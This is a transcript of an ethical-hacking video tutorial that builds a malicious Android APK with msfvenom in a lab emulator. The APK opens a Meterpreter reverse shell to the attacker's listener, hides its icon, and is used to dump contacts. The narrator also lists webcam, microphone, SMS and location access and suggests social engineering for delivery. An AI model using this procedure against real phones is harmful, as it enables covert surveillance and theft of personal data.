Yo, what's up people? Welcome back to Techniques, the #1 channel for cybersecurity, tutorials, and everything ethical hacking. So today guys, I'm going to go through exploitation of an Android phone using MSF Venom. So the last video that we did was on how to create custom payloads with MSF Venom. The link is down here below. Check out the video so that you'll understand how MSF Venom actually works, because today we're just going to go through fast. Okay, now what we are going to do basically is to try and create a malicious.apk file that will be sending to our target Android phone, that when clicked on or installed on that phone gives us a reverse shell. So the reason that Android is such a hacking target is because it powers almost 75% of mobile devices in this world. That makes it a juicy target. So today I'm going to use MSF Venom to create that payload, send it to the target phone. I have a phone here running, Samsung Galaxy S7. It's running on as a virtual machine, so I use it for demonstration purposes. You can also, I'll post a link here how you can go about installing this Genymotion Android emulator to practice your Android hacking skills ethically, of course. So I'm going to run sudo msf console. Remember, in the last video, just like I already had a Metasploit framework running. So remember, we can run MSF Venom inside the Metasploit framework, or if you prefer, you can open a new tab and run it independently. So let me just Control-Shift-T to open a new tab. But before that, let's try to list the exploits that are available inside the Metasploit framework. You remember the search function? I can do search, type exploit, then the platform that we are trying to attack is Android. So we have 11 exploits that target the Android operating systems. They're ranked according to if they're good, excellent, manual, or great. So these are the exploits. All of them are exploits targeting Android. So we also, some support check, some don't. Then you have a brief description of the exploit here. So when it comes to there's something you should know when it comes to Android. If you go back to let me just pull up the Android emulator. If I go to settings, there's something called the Android security patch level. It's right here, Android security patch level. So you can see that my virtual Android, the security patch level is from October 1, 2015. This makes it very, very insecure and very, very vulnerable. So yours should be something like, I think the latest one is March 1, 2022, according to mine too. So it will be March 1, 2022. So whenever you receive a security update via your settings, you should always go ahead and update your phone. It's always for your own benefit. Okay, so go to settings, check your Android security patch level. If it's March 1, 2022, you're safe. Anything below that, it's a security risk. So let's go back to our terminal. Now I also want to list all the payloads that we can use against our target. The same thing, I can pull up the last command with up key. Now I'm going to do type, just remove the type. I'll put payload. So we have 8 payloads that we can use against the target. The one that I always prefer is payload Android Metasploit reverse TCP. That's the one that we are going to use today to try and get a reverse shell on the Samsung Galaxy S7 virtual Android machine. So now I'm going to go ahead, go to the next tab. As I told you before, we can run MSF Venom inside the Metasploit framework, but if we prefer, we can open a new tab, run it independently. So I can do sudo MSF Venom. Let me just autocomplete. So that's the command. This is the command, the full command to create the payload. So we are using sudo for privileges, root privileges. The tool is MSF Venom. Then -p. If I open a new tab, do MSF Venom. So these are the options that we are using. Okay, these are all the options. So the -p is for listing the payload that you want to use. -f is for format. -e if you want to use an encoder. -a is for architecture or platform. Then -o is for output. So -p, we want to specify a payload, and this is the payload, Android Metasploit reverse TCP. Then our L host. Our L host is 192.168.1.552. So if I come here again, do ifconfig, you can see that my local IP is right there, 192.168.1.5.2. Then remember L port, we'll use a default port of 4444. Then I'm going to try and hide the icon from the user by using this switch, Android hide app icon, which I'm going to set to true. That means we're going to hide the, if we do successfully exploit the target, it will hide the icon from the app menu or app list. So just for trying to create to make sure that the user is not aware of what is going on. Okay, so I can also set the Android wake lock, going to set it to true. Then -f for format, we want raw. Then -o is for output, and then the name of the file, malicious.apk. So guys, that's the command. If I enter sudo password, MSF Venom will go ahead and create this payload with these conditions: L host 192.168.1.5.2, L port 444, and it also use this, whatever we try to describe here. So the payload has been created. Payload size is 10,192 bits. No ARC has been selected. So that is, and it has been saved as malicious.apk. So if I come to my home folder, I'll find that the malicious.apk is here. Okay. Now, what you can do from here is to try and send this malicious APK to our target phone. So you can do it if you have physical access to the phone. You can just go ahead, take the malicious APK and install it on the target phone. But if it's not near, you can always use other means like social engineering to try and deliver the payload to the target. So what I'm going to do, I'm just going to drag and drop it on the Samsung Galaxy virtual phone. Sorry. Okay, so it's there. So just drag it. Then if I come to the file manager, what's the file? So it's already installed. So did you guys see something here? The malicious activity just popped up, and then it just went off. like it was hidden. So let's try and where is it? Root. Where's the malicious.apk file? Where is it? Let me just try and search it. Malicious. Oh, where is it? No. Okay, it looks like it's already installed. Let me just go. APKs. I don't know why we are not seeing it. Malicious. Okay. So I'll just let's see the app manager. We should see something like malicious. Something like main activity. Main activity, where is main? Yep, main activity is here. So I don't know. Okay, so now we are going to try and create a reverse shell. So it's already installed. You can see it here, the main activity. So if I come to let me just go to this Metasploit framework. Now I can use exploit multi-handler. If I do options, I can do set lhost 192.168.1.52. Then L port is already been set. Now I can do set payload Android Metasploit reverse TCP. If I do options again, now everything has already been set. Now you can just run it. Now let me just go to let's try to drop it again. Oh, come on, let's go to the file manager. Okay, now we should see something going on in the background here. So we already have a session. So I sent the app, but too bad it didn't show the installation. It's right here, main activity. Then you remember when we created the payload, I put a description, Android hide app icon. So you won't see the main activity icon here. That's what we mean by that. So the main activity is not running. It's not running on the user can't see it, but in the background, if you go to apps, it's running. The main activity is right there. It's running right there. Okay. So if I look at the permissions, you'll see that it requests permission to the camera, contacts, location, microphone, phone, SMS, storage. Basically everything that it needs to totally take control of your device. Okay, so if I come to SYS info, you will see that it's Android version 6.0, and the architecture is 32-bit. I can do help. Then I can see that I have even more commands or more options that I can use to try and completely take over that phone. We can see that we have core commands. We can look at the processes that are running on the Android phone, the file system commands. We can make directories, we can remove directories, we can upload more backdoors, more malware, networking commands. We can do ifconfig to list the displays interfaces. We can do if it's system commands. We can execute even more commands. We can drop into a shell if you wanted to. We can take a screenshot of the interactive desktop. We can also record, we have webcam commands. We can record mic, we can record chat, we can list the webcam, so we can even stream. So we can also check for root. If I can do check root, the device is rooted. Okay, so I can also do app install. I can install application, I can dump SMS, I can geolocate the phone, I can do ps.aux to list all the processes that are running on that phone. So these are the processes that are currently running on the virtual Samsung Galaxy S7. Everything that is running is displayed there. Okay, so I can even drop into a shell. Then I can do pwd, I can do ls. If I cd to the root folder, then we have everything now. SD card, most probably that's where I will check. If it was a real device, I will have gone into SD card, check for documents, anything that might be of interest. Now I can exit from the shell. If I do help again, so there are no messages, there are no any stuff on the phone, the Samsung Galaxy S7. So there's nothing here to check. So if it were a real phone, you can imagine the kind of damage that could be done. So we don't have any messages, we don't have any call logs, and so let me just go ahead and try to create a contact, and we'll try to dump the list. Let's try to create okay, keep it local. Let me just say Adam. So let's say a number is 1 2 3 4 5 6 7 8. Let's just save it. I can do, let me create another one. We'll call it Sarah. The phone number would be, let's say 234. Just random numbers. Let's save it. Then let me create the last one. Let's say Amina. Then a random phone number. Then save it. So we have 3 contacts on the phone, on our virtual phone. Let's go and try to dump now. So if I come to contacts, I have Adam, Amina, and Sarah. So let's go ahead and try to dump those contacts. So what I can do dump underscore contacts. So this is fetching the 3 contacts into list. So if I come to my, let's go to file system, contacts dump. and they are here. You can see them right here: Adam, Sarah, and Amina. So that's how you can take full control of that phone. You can do more exploitation if you want, but that's how you exploit an Android phone. So the remedy for this problem, or what you can do to prevent something from this from happening to you, you always have to update your phone whenever an update is available. Even if you don't see an update, just go ahead, go to your phone, go to your settings, try to check for updates. It's always a good thing, and it's for your benefit, it's for your own good. Now that's it for today, guys. Thank you so much for tuning in to EH Techniques. Remember, more videos are coming, so subscribe so that you never miss a video, and I'll kindly try to reach out to you guys to help me reach 1,000 subscribers. It will be awesome, so that we can go ahead in this cybersecurity journey. Thank you, and God bless you. See you in the next video.